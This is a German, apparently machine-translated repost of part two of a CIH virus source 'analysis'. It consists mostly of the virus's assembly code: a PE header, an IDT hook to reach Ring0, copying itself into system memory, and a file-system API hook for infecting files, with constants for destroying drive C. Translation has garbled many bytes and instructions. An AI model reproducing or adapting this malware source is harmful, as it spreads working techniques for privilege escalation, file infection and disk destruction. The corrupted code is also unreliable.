Analyse von Beispielen für den Quellcode von Virenprogrammen – CIH-Virus[2]

Analyse von Beispielen für den Quellcode von Virenprogrammen – CIH-Virus[2]

OriginalAppEXE SEGMENT
　
　;Header der ausführbaren Datei im PE-Format
　FileHeader:
　db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 0. 04h , 000h , 000h, 000h, 0ffh, 0ffh, 000h, 000h
DB 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 000h
　db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db. 000h, 000h, 000h, 000h, 080h 000h, 000h, 000h 068h
db 061h , 06dh, 0 20h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 🎜> db 06dh, 06fh, 064h, 0 65h, 02eh, 00dh, 00dh , 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h h, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db. 000 Std., 000 Std., 000 Std., 000 Std., 000 Std , 000h, 000h, 000h, 000h
　db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
Datenbank 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 002h, 000h, 000h
Datenbank 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
Datenbank 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h Datenbank 000h, 000h, 010h, 000h, 000, 010, 000, 000 0h, 000h, 000h
db 000h ,000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h, 000h, 000h, 000h 000h 00h, 000h, 000h
　db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
Datenbank 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
　db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
DB 00 0h, 010 Std., 000 Std., 000 Std., 000 Std , 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
　db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h , 000h, 000h, 000h
　db 000h ,000h, 000h, 000h, 000h, 000h, 000h, 000h 00h, 000h, 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
　db 000h. , 000h, 000h, 000h, 000h, 000h, 000h, 000h
　db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
　db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
　db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize

OriginalAppEXE ENDS

; Virenprogramm startet
TRUE = 1
FALSE = 0
DEBUG = FALSE
　
　; Markieren Sie seine Versionsnummer als Version 1.4
MajorVirusVersion = 1; Hauptversionsnummer
MinorVirusVersion = 4; Nebenversionsnummer
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion; Synthetische Versionsnummer
　
　IF DEBUG;Ob debuggen?
　FirstKillHardDiskNumber = 81h;Laufwerk D zerstören
HookExceptionNumber = 05h ; Interrupt-Nummer 5 verwenden
ELSE
FirstKillHardDiskNumber = 80h ; Laufwerk C zerstören
HookxceptionNumber = 03h ; Interrupt-Nummer 3 verwenden

FileNameBufferSize = 7fh
　
; Virencode-Segment beginnt
VirusGame-SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame
> MyVirusStart :
push ebp

; Systemausnahmebehandlung ändern, um die Generierung von Fehlermeldungen zu vermeiden
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax , fs: [ebx]
　
　call @0
　
　@0:
　pop ebx; Verwenden Sie diesen Offset + relativen Offset, um die absolute Adresse
lea zu erhalten ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax

; Ändern Sie die Interrupt-Beschreibungstabelle, um die höchste Ring0-Berechtigung zu erhalten
push eax
sidt [esp- 02h] ; Basisadresse der Interrupt-Beschreibungstabelle für ebx abrufen
pop ebx ; add ebx, HookExceptionNumber*08h+04h ; Berechnen Sie die Basisadresse des Interrupts, der für ebx verwendet werden soll

cli ;Interrupts vor dem Ändern ausschalten
esi, MyExceptionHook-@1[ecx]
　
push esi ist die Adresse der Viren-Interrupt-Routine

mov [ebx-04h] , si;
shr esi, 16; Ändern Sie die Ausnahme
mov [ebx+02h], si ; Ändern Sie die Interrupt-Basisadresse, um auf die Virus-Interrupt-Routine zu verweisen

pop esi

; Erzeuge eine Ausnahme, die in die Ring0-Ebene eintritt
int HookExceptionNumber ; to Interrupt, um in die Ring0-Ebene einzutreten
ReturnAddressOfEndException = $

; Alle Virencodes zusammenführen
push esi
mov esi, eax; esi zeigt auf den Anfang des Virus

; Loop Copy
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]

rep movsb ; erste Adresse des zugewiesenen Systemspeichers
sub eax, 08h
mov esi, [eax]
　or esi, esi
　jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
　
　jmp LoopOfMergeAllVirusCodeSection;Copy the nächster Absatz
　
　QuitLoopOfMergeAllVirusCodeSection:
pop esi
int HookExceptionNumber
　
　; Ausnahmebehandlung speichern
　ReadyRestoreSE:
　sti;Open interrupt
　xor ebx, ebx, Der Virus stoppt die Ausführung und springt direkt zum ursprünglichen Programm
StopToRunVirusCode:
@1 = StopToRunVirusCode

xor ebx, ebx
mov eax, fs:[ebx]
mov esp , [eax]
　
　RestoreSE:
　pop dword ptr fs:[ebx]
　pop eax
　
　; Zum Originalprogramm springen und normal ausführen
　pop ebp
　
　push 00401000h
　OriginalAddressOfEntryPoint = $-4;Schiebt die Startadresse des Originalprogramms auf den Stapel
　ret;Kehrt als Unterprogramm zum Anfang des Originalprogramms zurück
　; Virus-Initialisierungsmodul
　MyExceptionHook:
　@2 = MyExceptionHook
　
　jz InstallMyFileSystemApiHook; Wenn der Virencode kopiert wurde
　; Gehen Sie zum Programm, um den System-Hook zu installieren
　
mov ecx , dr0 ; Überprüfen Sie, ob dr0 gesetzt wurde (dr0 ist das Virus-Residenz-Flag)
jecxz AllocateSystemMemoryPage ; Wenn nicht gesetzt, ordnen Sie Systemspeicher zu

fügen Sie dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
Zurück zum ursprünglichen Programm
ExitRing0Init:
mov [ebx-04h], bp ; Shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; ursprüngliche Interrupt-Basisadresse
　
　iretd;Interrupt-Rückgabe
　
　;Zu verwendenden Systemspeicher zuweisen
　AllocateSystemMemoryPage:
　mov dr0, ebx;Setzen Sie das Flag der Virenresidenz dr0
　push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;Call method ULONG EXTERN _PageAllocate(ULONG nPages,
; ULONG VM, ULONG AlignMask,
; $
dd 00010053h;Eax-, ecx-, edx- und Flag-Register verwenden
esp hinzufügen, 08h*04h;Stapelzeiger wiederherstellen

xchg edi, eax;edi zeigt auf die erste Adresse des zugewiesenen Systemspeichers
lea eax , MyVirusStart-@2[esi] ;eax zeigt auf den Start des Virus
　
iretd ;Interrupt beenden

; Initialisieren Sie den Dateisystem-Hook
InstallMyFileSystemApiHook:
lea eax , FileSystemApiHook-@6 [edi] ; Zeigen Sie auf die erste Adresse des Dateisystem-Hook-Programms
　
　push eax;
　int 20h; Vxd ruft IFSMgr_InstallFileSystemApiHook
　dd 00 auf 400067h; Verwenden Sie eax, ecx, edx und flags register
　
mov dr0, eax; Speichern Sie die erste Adresse des ursprünglichen Dateisystem-Hook-Programms in dr0
pop eax entspricht der ersten Adresse des Dateisystem-Hook-Programms

; Speichern Sie den ursprünglichen IFSMgr_InstallFileSystemApiHook-Funktionsaufruf-Eintrag
　mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx] ;edx ist der Eintrag von IFSMgr_InstallFileSystemApiHook
mov OldInstallFileSystemApiHook-@3[ eax], edx
　
; IFSMGR_INSTALLFILESYSTEMAPIHOOK-Eingang ändern
Lea Eax, InstallfileSystemapihook-@3 [Eax]
; um auf InstallfileSystemapihook
zu verweisen;


Das Obige ist der Inhalt der Beispielanalyse des Virenprogramm-Quellcodes – CIH-Virus [2]. Weitere verwandte Inhalte finden Sie auf der chinesischen PHP-Website (www.php.cn). )!